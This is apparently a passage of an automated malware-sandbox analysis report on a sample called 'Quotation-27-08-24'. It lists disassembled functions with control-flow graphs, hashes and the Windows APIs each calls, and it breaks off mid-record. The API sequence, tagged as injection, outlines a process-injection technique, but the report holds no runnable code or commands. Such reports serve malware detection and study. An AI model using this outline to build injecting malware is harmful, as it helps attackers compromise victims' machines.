                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073F9F0E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: ea1e8ee921683ae9e5717adb7947e8ec394367c256825cb7b50f313971186495
                                          • Instruction ID: f878f4adb55ff480191265acf6baf0b52b28bfbbe0539f786610b35e7cf42e83
                                          • Opcode Fuzzy Hash: ea1e8ee921683ae9e5717adb7947e8ec394367c256825cb7b50f313971186495
                                          • Instruction Fuzzy Hash: 4AA15BB1D0031ADFEB10CF69C841BDEBBB2AF48314F14816AE908E7280DB759985CF91
                                          Function 073F9CD8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 257 73f9cd8-73f9d6d 259 73f9d6f-73f9d79 257->259 260 73f9da6-73f9dc6 257->260 259->260 261 73f9d7b-73f9d7d 259->261 265 73f9dff-73f9e2e 260->265 266 73f9dc8-73f9dd2 260->266 263 73f9d7f-73f9d89 261->263 264 73f9da0-73f9da3 261->264 267 73f9d8d-73f9d9c 263->267 268 73f9d8b 263->268 264->260 274 73f9e67-73f9f21 CreateProcessA 265->274 275 73f9e30-73f9e3a 265->275 266->265 270 73f9dd4-73f9dd6 266->270 267->267 269 73f9d9e 267->269 268->267 269->264 271 73f9df9-73f9dfc 270->271 272 73f9dd8-73f9de2 270->272 271->265 276 73f9de6-73f9df5 272->276 277 73f9de4 272->277 288 73f9f2a-73f9fb0 274->288 289 73f9f23-73f9f29 274->289 275->274 278 73f9e3c-73f9e3e 275->278 276->276 279 73f9df7 276->279 277->276 280 73f9e61-73f9e64 278->280 281 73f9e40-73f9e4a 278->281 279->271 280->274 283 73f9e4e-73f9e5d 281->283 284 73f9e4c 281->284 283->283 285 73f9e5f 283->285 284->283 285->280 299 73f9fb2-73f9fb6 288->299 300 73f9fc0-73f9fc4 288->300 289->288 299->300 301 73f9fb8 299->301 302 73f9fc6-73f9fca 300->302 303 73f9fd4-73f9fd8 300->303 301->300 302->303 306 73f9fcc 302->306 304 73f9fda-73f9fde 303->304 305 73f9fe8-73f9fec 303->305 304->305 307 73f9fe0 304->307 308 73f9ffe-73fa005 305->308 309 73f9fee-73f9ff4 305->309 306->303 307->305 310 73fa01c 308->310 311 73fa007-73fa016 308->311 309->308 313 73fa01d 310->313 311->310 313->313
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073F9F0E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 722a99f5776be5cdc76636c8568dd41e76328f2f70ec9d8bd8b70b64bb1635c2
                                          • Instruction ID: 8d09823a3248edbb1903c50f08175696980e7a489452266c12f71441904ceffd
                                          • Opcode Fuzzy Hash: 722a99f5776be5cdc76636c8568dd41e76328f2f70ec9d8bd8b70b64bb1635c2
                                          • Instruction Fuzzy Hash: FD915BB1D0031ADFEB10DF69C841BDEBBB2AF48314F14816AE908E7280DB759985CF91
                                          Function 053834C9 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 314 53834c9-5383536 316 5383538-538353e 314->316 317 5383541-5383548 314->317 316->317 318 538354a-5383550 317->318 319 5383553-53835f2 CreateWindowExW 317->319 318->319 321 53835fb-5383633 319->321 322 53835f4-53835fa 319->322 326 5383640 321->326 327 5383635-5383638 321->327 322->321 328 5383641 326->328 327->326 328->328
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053835E2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130747844.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5380000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 63a034b8beac38868a0cce494a5bbbfc982522955f6afdcdb71ac196ceeefe7e
                                          • Instruction ID: 2df405fa4b124412e3b2dbd7c3edde2ab9efa86fb18849acd7b3492a801a16c6
                                          • Opcode Fuzzy Hash: 63a034b8beac38868a0cce494a5bbbfc982522955f6afdcdb71ac196ceeefe7e
                                          • Instruction Fuzzy Hash: EA51E0B1D00349DFDB14DF9AC884ADEBBB5BF48710F20852AE819AB210D7B4A945CF90
                                          Function 053834D0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 329 53834d0-5383536 330 5383538-538353e 329->330 331 5383541-5383548 329->331 330->331 332 538354a-5383550 331->332 333 5383553-53835f2 CreateWindowExW 331->333 332->333 335 53835fb-5383633 333->335 336 53835f4-53835fa 333->336 340 5383640 335->340 341 5383635-5383638 335->341 336->335 342 5383641 340->342 341->340 342->342
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053835E2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130747844.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5380000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 109d00c5c15e016506336ffb293b1ab6df378f824bed172ad2519976843bffdd
                                          • Instruction ID: 6df5f1ea9f72e2bda7ddfb0c12ad456ccaa0ad60581701156a723e17af65cc5e
                                          • Opcode Fuzzy Hash: 109d00c5c15e016506336ffb293b1ab6df378f824bed172ad2519976843bffdd
                                          • Instruction Fuzzy Hash: DD41BEB1D00349DFDB14CF9AC884ADEBBB5BF48710F24852AE819AB210D7B5A945CF90
                                          Function 01405C2C Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 343 1405c2c-1405c36 344 1405c38-1405cf9 CreateActCtxA 343->344 346 1405d02-1405d5c 344->346 347 1405cfb-1405d01 344->347 354 1405d6b-1405d6f 346->354 355 1405d5e-1405d61 346->355 347->346 356 1405d80 354->356 357 1405d71-1405d7d 354->357 355->354 359 1405d81 356->359 357->356 359->359
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 01405CE9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 990f381faf64a0369a425f1958b4b5f60e91b6fb4435cd70486eda3378293175
                                          • Instruction ID: bec437c7cf7234f50225c44f1e527f4dd7616d78fc0ade42960fc873ccedb777
                                          • Opcode Fuzzy Hash: 990f381faf64a0369a425f1958b4b5f60e91b6fb4435cd70486eda3378293175
                                          • Instruction Fuzzy Hash: 7941C3B1C00719CBDB15CFAAC948BDEBBB5FF45704F20816AD408AB251DB756946CF90
                                          Function 05383204 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 360 5383204-5385adc 363 5385b8c-5385bac call 53830dc 360->363 364 5385ae2-5385ae7 360->364 371 5385baf-5385bbc 363->371 366 5385ae9-5385b20 364->366 367 5385b3a-5385b72 CallWindowProcW 364->367 373 5385b29-5385b38 366->373 374 5385b22-5385b28 366->374 369 5385b7b-5385b8a 367->369 370 5385b74-5385b7a 367->370 369->371 370->369 373->371 374->373
                                          APIs
                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 05385B61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130747844.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5380000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: CallProcWindow
                                          • String ID:
                                          • API String ID: 2714655100-0
                                          • Opcode ID: e67b02736cbd71fa546733568ec42e4b4f65a26710c127b7ba2dbd32754b4ce2
                                          • Instruction ID: b00ee6c766ebb11edf74a700d0e2f6423b909af94c4427424dd8832f5b66f08c
                                          • Opcode Fuzzy Hash: e67b02736cbd71fa546733568ec42e4b4f65a26710c127b7ba2dbd32754b4ce2
                                          • Instruction Fuzzy Hash: 3E412CB9900305DFCB19DF99C488BAABBF5FF89314F248459D519A7321D774A841CFA0
                                          Function 01404824 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 377 1404824-1405cf9 CreateActCtxA 380 1405d02-1405d5c 377->380 381 1405cfb-1405d01 377->381 388 1405d6b-1405d6f 380->388 389 1405d5e-1405d61 380->389 381->380 390 1405d80 388->390 391 1405d71-1405d7d 388->391 389->388 393 1405d81 390->393 391->390 393->393
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 01405CE9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: c7753965ace5e4d31d5c19567cdd4ae74352f9eda7852c3d87c461a0e184ea39
                                          • Instruction ID: 5cfbe48f4241b68d31c2ea63e66d5c316a877fe53f4264749e8bd068ec184f05
                                          • Opcode Fuzzy Hash: c7753965ace5e4d31d5c19567cdd4ae74352f9eda7852c3d87c461a0e184ea39
                                          • Instruction Fuzzy Hash: C441E270C0071DCBEB25CFAAC948B9EBBB5FF48704F20816AD408AB251DB756946CF90
                                          Function 073F9A4B Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 394 73f9a4b-73f9a9e 397 73f9aae-73f9aed WriteProcessMemory 394->397 398 73f9aa0-73f9aac 394->398 400 73f9aef-73f9af5 397->400 401 73f9af6-73f9b26 397->401 398->397 400->401
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073F9AE0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 25cc14613bfcc162f3ac75e0412be40063d295814c144e802e99ff276b85600b
                                          • Instruction ID: 010cbd51b1a8ba2993e476077d70ebf53e592c0e0e2289147263d2e4343ebc89
                                          • Opcode Fuzzy Hash: 25cc14613bfcc162f3ac75e0412be40063d295814c144e802e99ff276b85600b
                                          • Instruction Fuzzy Hash: 792139B19003499FDF10CFAAC881BDEBBF4FF48310F108429E958A7241D778A550CB60
                                          Function 073F9A50 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 405 73f9a50-73f9a9e 407 73f9aae-73f9aed WriteProcessMemory 405->407 408 73f9aa0-73f9aac 405->408 410 73f9aef-73f9af5 407->410 411 73f9af6-73f9b26 407->411 408->407 410->411
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073F9AE0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: e305c6e43acd4659be566579b771bf72fd881ad32db6ebe30c039a51f1a804bb
                                          • Instruction ID: 3afff3f86c768e4a32effc6ca4fbad5af6b497a619ff0a7d4f6cf044c3d20e9f
                                          • Opcode Fuzzy Hash: e305c6e43acd4659be566579b771bf72fd881ad32db6ebe30c039a51f1a804bb
                                          • Instruction Fuzzy Hash: AB2117B59003499FDF10DFAAC881BDEBBF5BF48310F108429EA59A7240D778A550CBA4
                                          Function 073F947B Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 415 73f947b-73f94cb 418 73f94cd-73f94d9 415->418 419 73f94db-73f950b Wow64SetThreadContext 415->419 418->419 421 73f950d-73f9513 419->421 422 73f9514-73f9544 419->422 421->422
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073F94FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: f4b94cbb1cbc83b694269dcb47d40252aa9051e71ff0498d214ceb84cdf063bf
                                          • Instruction ID: c1413ef9b917386f639c7fe5a344e214094126f79e9b2e56e7e9ee6b210e4154
                                          • Opcode Fuzzy Hash: f4b94cbb1cbc83b694269dcb47d40252aa9051e71ff0498d214ceb84cdf063bf
                                          • Instruction Fuzzy Hash: 76216AB19003099FEB10CFAAC4857EEBBF4EF88324F14842AD559A7241D778A545CFA0
                                          Function 0140E770 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 426 140e770-140ef3c DuplicateHandle 428 140ef45-140ef62 426->428 429 140ef3e-140ef44 426->429 429->428
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0140EE6E,?,?,?,?,?), ref: 0140EF2F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 6b45d3265fe7aada55adb5ca3b06a823ca5cd31ac8676005eb085fdb4277b89a
                                          • Instruction ID: e152d250697036eb61a3a2e582f80466faaf2e3d0ee66620b4255b80512d3b1e
                                          • Opcode Fuzzy Hash: 6b45d3265fe7aada55adb5ca3b06a823ca5cd31ac8676005eb085fdb4277b89a
                                          • Instruction Fuzzy Hash: 4821E5B5900249EFDB10CF9AD584ADEBFF4EB48320F14841AE914B3350D374A950CFA4
                                          Function 073F9B3E Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073F9BC0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: e98732e285fc804e299be98d4db5bdb4bf4c07e2906d390095c4b0789e4c89cb
                                          • Instruction ID: ad9db758ed151c5d341ae5ae74c5f2a0b13fc04124e8e2444d143a74bb56f35c
                                          • Opcode Fuzzy Hash: e98732e285fc804e299be98d4db5bdb4bf4c07e2906d390095c4b0789e4c89cb
                                          • Instruction Fuzzy Hash: 9E2107B19003499FDB10CFAAC881BDEBBF5FF48310F10882AE559A7240D774A950CBA5
                                          Function 073F9480 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073F94FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 0277e7edaf4ba91adf3d73db3288d286593c0ab2ec060db5d5f6bd3035673173
                                          • Instruction ID: 0cfd700bb157963f280a0b6beae7fa91121a4d26fcab4dd7eab5606270951cd0
                                          • Opcode Fuzzy Hash: 0277e7edaf4ba91adf3d73db3288d286593c0ab2ec060db5d5f6bd3035673173
                                          • Instruction Fuzzy Hash: 5F214CB19003099FDB10DFAAC4857EEBBF4EF88314F14842AD519A7240D778A544CFA5
                                          Function 073F9B40 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073F9BC0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 8d1e80c91cdc2d660cb436097387ae98d7e1812c295372c6a8b2a754f925d88b
                                          • Instruction ID: 7906cb53fc8e8a5cc1f2cf679a976babc18cbd5b85d5d84fdbf2439923ac208d
                                          • Opcode Fuzzy Hash: 8d1e80c91cdc2d660cb436097387ae98d7e1812c295372c6a8b2a754f925d88b
                                          • Instruction Fuzzy Hash: AA21E6B1D003599FDB10DFAAC881BDEBBF5FF48310F10882AE519A7240D779A950CBA5
                                          Function 073F998B Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073F99FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 0f45adcc9ccb53c42e78b24ee31a6d72c0b454d94d29aa17bf1af56e4084fe97
                                          • Instruction ID: d4f7250227197e7ba8471bc5e29869a3b1a43966af80283fd4bde30b625342a1
                                          • Opcode Fuzzy Hash: 0f45adcc9ccb53c42e78b24ee31a6d72c0b454d94d29aa17bf1af56e4084fe97
                                          • Instruction Fuzzy Hash: 0B114776900249DFDF10CFAAC845BDEBBF5EF88720F248419E519A7250C775A550CFA1
                                          Function 0140BCD8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0140CC99,00000800,00000000,00000000), ref: 0140CEAA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 7e1b1ddcdb43a8972e8a7f9f769fce7214bfab316632b45e690bfbf7533e46ab
                                          • Instruction ID: ca7a1b09f8c1268d42a1d7bda8b3dc25a29764c7d7536ed0368c455840dccbd2
                                          • Opcode Fuzzy Hash: 7e1b1ddcdb43a8972e8a7f9f769fce7214bfab316632b45e690bfbf7533e46ab
                                          • Instruction Fuzzy Hash: 631117B6900309DFDB10CF9AD484BDEFBF4EB48320F10856AD519A7250C375A945CFA4
                                          Function 073F9990 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073F99FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: de7fb8891700c83e29cc533029169e0bfe28bdcc40d8851c8da0c050d191978f
                                          • Instruction ID: 493e53963fab68571603911fda7bf8996e92c9c4bf7b60d36310e50adcdae317
                                          • Opcode Fuzzy Hash: de7fb8891700c83e29cc533029169e0bfe28bdcc40d8851c8da0c050d191978f
                                          • Instruction Fuzzy Hash: B11156729002499FDF10CFAAC844BDEBBF5AF88320F208819E619A7250C775A550CFA0
                                          Function 073F8F93 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 08d39c5d7032222c300fe738ac5f135fbdf40928a03e8af5ed6c9265a1467fb1
                                          • Instruction ID: e34fd21739441231383de176cb1e6345ba0d16e38de0242b227387899723ae25
                                          • Opcode Fuzzy Hash: 08d39c5d7032222c300fe738ac5f135fbdf40928a03e8af5ed6c9265a1467fb1
                                          • Instruction Fuzzy Hash: 381188B19003898FDB20CFAAC4447DEFBF4EF88724F24881AD519A7200CB75A840CF94
                                          Function 073FD2DC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,073FDF21,?,?), ref: 073FE0C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: 0f769b000f92cf3c807961cda6d05552df0950a4a9bfae8d0dccf933ea3a8d41
                                          • Instruction ID: c60f1995be573794f2e98d32225ae93218843ffb6766d6b2875d1154ee312a2b
                                          • Opcode Fuzzy Hash: 0f769b000f92cf3c807961cda6d05552df0950a4a9bfae8d0dccf933ea3a8d41
                                          • Instruction Fuzzy Hash: 821128B5800749DFDB20DF9AC545BDEBBF4EB48320F108419D619A7250D778A944CFA5
                                          Function 073FE06B Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,073FDF21,?,?), ref: 073FE0C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: d082812a453c0b85d590d7f8e1ea0b7e7c16f284d485d1d145e97c7430034d6a
                                          • Instruction ID: 2e813058c20a3146b5401dc36d872cf7a0728d0d26b3eeb1dc2b69d7400d4b78
                                          • Opcode Fuzzy Hash: d082812a453c0b85d590d7f8e1ea0b7e7c16f284d485d1d145e97c7430034d6a
                                          • Instruction Fuzzy Hash: 061143B580024ACFDB20CFAAC544BEEBBF4EF48320F24845AD558A7241D778A544CFA1
                                          Function 073F8F98 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 04bcc813c03d422607674fa28f2c97c75190963d5af22a6426489961a591aac1
                                          • Instruction ID: 104667c37fffcec1fe8c69b4bed2f34f970a643ca2f94ae7f84091545b3e4d82
                                          • Opcode Fuzzy Hash: 04bcc813c03d422607674fa28f2c97c75190963d5af22a6426489961a591aac1
                                          • Instruction Fuzzy Hash: B0113AB19003498FDB20DFAAD4457DEFBF5AF88724F248819D519A7240CB75A540CF95
                                          Function 073FBD30 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 073FC4FD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 1cd9cc964b7d53855e5073149f0fd8d8c8b37ae4cb486a61724d3c083b994b92
                                          • Instruction ID: eac6cb0b0eaf0e0c0ae322b1b4ef2f73f2a4fadbb2f25fbe3dd682528d50859b
                                          • Opcode Fuzzy Hash: 1cd9cc964b7d53855e5073149f0fd8d8c8b37ae4cb486a61724d3c083b994b92
                                          • Instruction Fuzzy Hash: D111F5B5800759DFDB10DF9AD545BEEBBF8EB48320F108419E619B7240C3B5A944CFA1
                                          Function 0140CBB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0140CC1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 1fd1626158096342048eddaef6789f07bf5b4c1ef12e5b56bb5eb2a1f2fd94f2
                                          • Instruction ID: fd9d1dde64974259e269b1decc1a685a48a0b7172587e036d4f8b0d718486e3d
                                          • Opcode Fuzzy Hash: 1fd1626158096342048eddaef6789f07bf5b4c1ef12e5b56bb5eb2a1f2fd94f2
                                          • Instruction Fuzzy Hash: 08110FB6C00249CFDB10CF9AD544BDEFBF4AB88224F20856AD519A7250C379A545CFA1
                                          Function 073FC49B Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 073FC4FD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 7ac998f43ac90617874e4adf0bddd34df11f080518ffefc1d6ceba747bab01e5
                                          • Instruction ID: 56828af703b28731b829b190e0dfd0251d9b9bd869fbe30d06939cf523f3c4b6
